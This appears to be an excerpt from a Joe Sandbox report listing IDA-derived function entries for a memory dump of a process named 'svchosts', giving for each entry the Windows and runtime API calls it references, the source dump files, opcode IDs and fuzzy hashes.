                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                      • String ID:
                                                                      • API String ID: 1175261203-0
                                                                      • Opcode ID: ca375d96f1442dd9667630e9681795118843299ad9f5c2b52d5b0a173d37b406
                                                                      • Instruction ID: ac7a185971d1b5742545897f49e9cea19ba039e96ba59dbaf279254e6d9cace6
                                                                      • Opcode Fuzzy Hash: ca375d96f1442dd9667630e9681795118843299ad9f5c2b52d5b0a173d37b406
                                                                      • Instruction Fuzzy Hash: BCE0127691115C6BDF219AA4AC09FE7776CEF09382F0444A5B948D3104DA749A548FA0
                                                                      APIs
                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002A9B30
                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002A9B37
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: BitmapCreateFromGdipStream
                                                                      • String ID:
                                                                      • API String ID: 1918208029-0
                                                                      • Opcode ID: 29ceaa01bb66ee53e3ec5d50be8a232272a2b63eb54dd1258beb555e72f679c0
                                                                      • Instruction ID: 1e942ba4847445150a0bf437721192ee42dee9f5633f802a156afb0cdac5cc84
                                                                      • Opcode Fuzzy Hash: 29ceaa01bb66ee53e3ec5d50be8a232272a2b63eb54dd1258beb555e72f679c0
                                                                      • Instruction Fuzzy Hash: 1DE0ED71921218EBCB10DF99D501B9AB7FCEB05321F20859FEC9593600DAB16E649FA1
                                                                      APIs
                                                                        • Part of subcall function 002B329A: try_get_function.LIBVCRUNTIME ref: 002B32AF
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B217A
                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 002B2185
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                      • String ID:
                                                                      • API String ID: 806969131-0
                                                                      • Opcode ID: b6d464982d5cfab9ce14356d77ad1f18608b0f93673648d58cd9b22e30c9b103
                                                                      • Instruction ID: b70704ecdd009d383fdf453a6aa5bcc4c332f1243ff1256a26df807b81a9488a
                                                                      • Opcode Fuzzy Hash: b6d464982d5cfab9ce14356d77ad1f18608b0f93673648d58cd9b22e30c9b103
                                                                      • Instruction Fuzzy Hash: 83D0A974234306E46C186AB828424E933885963BF03F00B9AEB348A0E3EE10A03C6A11
                                                                      APIs
                                                                      • DloadLock.DELAYIMP ref: 002ADC73
                                                                      • DloadProtectSection.DELAYIMP ref: 002ADC8F
                                                                        • Part of subcall function 002ADE67: DloadObtainSection.DELAYIMP ref: 002ADE77
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Dload$Section$LockObtainProtect
                                                                      • String ID:
                                                                      • API String ID: 731663317-0
                                                                      • Opcode ID: 17e219af65a3352def00cb4101091351ef997f1d485d04a20981e6477e272afe
                                                                      • Instruction ID: 45159284de7b8469c25fa6b29c4b19a00e0cd96a08e0dc9f957e4a1dbd6504ca
                                                                      • Opcode Fuzzy Hash: 17e219af65a3352def00cb4101091351ef997f1d485d04a20981e6477e272afe
                                                                      • Instruction Fuzzy Hash: B6D0C9741202124BC211EB14AD8A72C22B1B7167E4FE40613F107C6DA2DFE844B0CA45
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ItemShowWindow
                                                                      • String ID:
                                                                      • API String ID: 3351165006-0
                                                                      • Opcode ID: 950d874bb44429334415db5189bfec22087711af9b19ec39db9939cc55909e3e
                                                                      • Instruction ID: 5791c03a79b4d4a2d32deb8d69a8dc1c82abbb92a837ba2468ae3ee61ecafe26
                                                                      • Opcode Fuzzy Hash: 950d874bb44429334415db5189bfec22087711af9b19ec39db9939cc55909e3e
                                                                      • Instruction Fuzzy Hash: 4AC01232058200FECB010BB0EC0DD3FBFA8ABA6222F05C928B2A9C0061C238C018DF11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: f21529a0ecdf430a0bdac4439ab6703e9227e619ed1d07bedf29acd7c61f689d
                                                                      • Instruction ID: 3dafb24a250149cb5966c7ff341e6e525429722fa986443f33d560ebc479bf7c
                                                                      • Opcode Fuzzy Hash: f21529a0ecdf430a0bdac4439ab6703e9227e619ed1d07bedf29acd7c61f689d
                                                                      • Instruction Fuzzy Hash: 2AC10470A242469FEF15CF69C494BA97BA5EF0A304F0844BADC45DF282CB319D74CB62
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 3e218cb1fcb48ec31ab7b804cafa5ff34fa9acb1d7b53ae4b50814020c210f0e
                                                                      • Instruction ID: 1b57aab85cf2bb94fc4b175521c7fd39e380d3d181b16f48d4f6f3269cd70336
                                                                      • Opcode Fuzzy Hash: 3e218cb1fcb48ec31ab7b804cafa5ff34fa9acb1d7b53ae4b50814020c210f0e
                                                                      • Instruction Fuzzy Hash: FB71EE71124F44AEDF25DF34CC51AEBB7E8AF14301F44492EE5AB47242DA316A68CF20
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00298384
                                                                        • Part of subcall function 00291380: __EH_prolog.LIBCMT ref: 00291385
                                                                        • Part of subcall function 00291380: new.LIBCMT ref: 002913FE
                                                                        • Part of subcall function 002919A6: __EH_prolog.LIBCMT ref: 002919AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 5c1cbeec9eddc814267541008a4bd4cffe773bec0fcb59900b0963b943232dc3
                                                                      • Instruction ID: b4ce6698bb513adfb1ad6f0b155c2d599da7dcb238bae48cf11cb667d87888b5
                                                                      • Opcode Fuzzy Hash: 5c1cbeec9eddc814267541008a4bd4cffe773bec0fcb59900b0963b943232dc3
                                                                      • Instruction Fuzzy Hash: 0741A2318606599ADF20DB60CC55BEA73B8AF51300F0840EAE58AA7093DF745EE8DF50
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00291E05
                                                                        • Part of subcall function 00293B3D: __EH_prolog.LIBCMT ref: 00293B42
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 0a5901271da38ebb3e73691dbb0f26a618035eccb76d8e8ed5892a2e62a8209a
                                                                      • Instruction ID: c2c9ea09815c6fa33aed9be6fe70e747e6a9b6d58fb44b6bb28abeaef9005516
                                                                      • Opcode Fuzzy Hash: 0a5901271da38ebb3e73691dbb0f26a618035eccb76d8e8ed5892a2e62a8209a
                                                                      • Instruction Fuzzy Hash: 7521287292410A9FCF11EF9AD9519EEBBF5BF59300B1004AEE845A7251CB325E30CF60
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 002AA7C8
                                                                        • Part of subcall function 00291380: __EH_prolog.LIBCMT ref: 00291385
                                                                        • Part of subcall function 00291380: new.LIBCMT ref: 002913FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 3905ec9d9bf2e5ff96629b47df979908476dea81e4bb25446e469ca0083a05aa
                                                                      • Instruction ID: 20bb75eb246db8cee153b06b4f1a182b14f3f1b734ccd596838966f3e9fb23c4
                                                                      • Opcode Fuzzy Hash: 3905ec9d9bf2e5ff96629b47df979908476dea81e4bb25446e469ca0083a05aa
                                                                      • Instruction Fuzzy Hash: 6E215C71C1424AAFCF14DF95C9529EEB7B4AF19300F0004EEE809A3242DB356E26CF61
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 0eeff8d54303a564640c337e4c12501a8fa4038649a7f93094c24f94024c267c
                                                                      • Instruction ID: a4a953ca90c13ec8c1e9c6fe3f2a87fd186acc627f3d490bc907e9141723b09b
                                                                      • Opcode Fuzzy Hash: 0eeff8d54303a564640c337e4c12501a8fa4038649a7f93094c24f94024c267c
                                                                      • Instruction Fuzzy Hash: 3511A573D205299BCF22AFACCC429DDB735EF88760F454159FC08B7251CA358D708AA4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                                      • Instruction ID: 0a8d3ab1854ee3d1a740551e016beceee51a50c87dd8f4f2ec421ba04d565c64
                                                                      • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                                      • Instruction Fuzzy Hash: 35F03C315257069FDF70DE65C945716B7F8EB15320F20891EE49AC6690EB70D8A0CBD2
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00295BDC
                                                                        • Part of subcall function 0029B07D: __EH_prolog.LIBCMT ref: 0029B082
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 2e64cdcb8cc1402bd50f2c026a75cb6d998ce2d3e1ff7583c91a46a53828f3c0
                                                                      • Instruction ID: d154f422c4bff7c3a3925457d91006d573eb40994e16448c0d48be7b8d35058e
                                                                      • Opcode Fuzzy Hash: 2e64cdcb8cc1402bd50f2c026a75cb6d998ce2d3e1ff7583c91a46a53828f3c0
                                                                      • Instruction Fuzzy Hash: 7701D134A20684DACB65F7B4C1453DDF7A49F1A300F40419DA89A93283CFB01B18CB62
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: f23845654a197637b26787e32180d57c57ae6847ff012828200c09dae63e6c0f
                                                                      • Instruction ID: ed5a8cd2dc50d843f08d7b5c1528051caf0daef0178f81da9d87d3d4e5d5583f
                                                                      • Opcode Fuzzy Hash: f23845654a197637b26787e32180d57c57ae6847ff012828200c09dae63e6c0f
                                                                      • Instruction Fuzzy Hash: 5BE0E5315702229AEB312E699C05BDA37CC9B413F0F9A0220AD5CA2086CE60CC20CBE5
                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0029968F,?,?,?,?,002C1FA1,000000FF), ref: 002996EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 72dbfc150df14293e66643c52ecfe71bded5c5a91857e457c0a42e53c40246b5
                                                                      • Instruction ID: 4089fadc2d8d8995deb51177229d7d36aa851b79d9a9a2111ddf64d5d619b578
                                                                      • Opcode Fuzzy Hash: 72dbfc150df14293e66643c52ecfe71bded5c5a91857e457c0a42e53c40246b5
                                                                      • Instruction Fuzzy Hash: 18F089715667054FDF308E28D548B92B7E89B16735F048B2ED0F7435E4D76168AD8F00
                                                                      APIs
                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0029A4F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: 04a17db5407c2cc9f6a0c126898e559c78de15e8e1866f28684829101e3c5440
                                                                      • Instruction ID: 793a07636557780d7b0c64c48973fc08819434ce56f4e98b0631a45a82744e26
                                                                      • Opcode Fuzzy Hash: 04a17db5407c2cc9f6a0c126898e559c78de15e8e1866f28684829101e3c5440
                                                                      • Instruction Fuzzy Hash: BCF0E931428380AACF225B7848047C77BA0AF05331F14CA09F5FD02191C2B414A59F63
                                                                      APIs
                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 002A06B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ExecutionStateThread
                                                                      • String ID:
                                                                      • API String ID: 2211380416-0
                                                                      • Opcode ID: 54a2a7b47eb31da26722b18cc2fd285f0d930b2c118bb58e5e2becf80e2418bd
                                                                      • Instruction ID: 7c9e817a14408eaea2572deab232a0c3be6c91af55ea7dab7dc4cba2a12584ce
                                                                      • Opcode Fuzzy Hash: 54a2a7b47eb31da26722b18cc2fd285f0d930b2c118bb58e5e2becf80e2418bd
                                                                      • Instruction Fuzzy Hash: 1DD0C2256311102BCE317B24A88EBFE1A4A4FC3B20F080062B04D136968E460CB68AA2
                                                                      APIs
                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 002A9D81
                                                                        • Part of subcall function 002A9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002A9B30
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
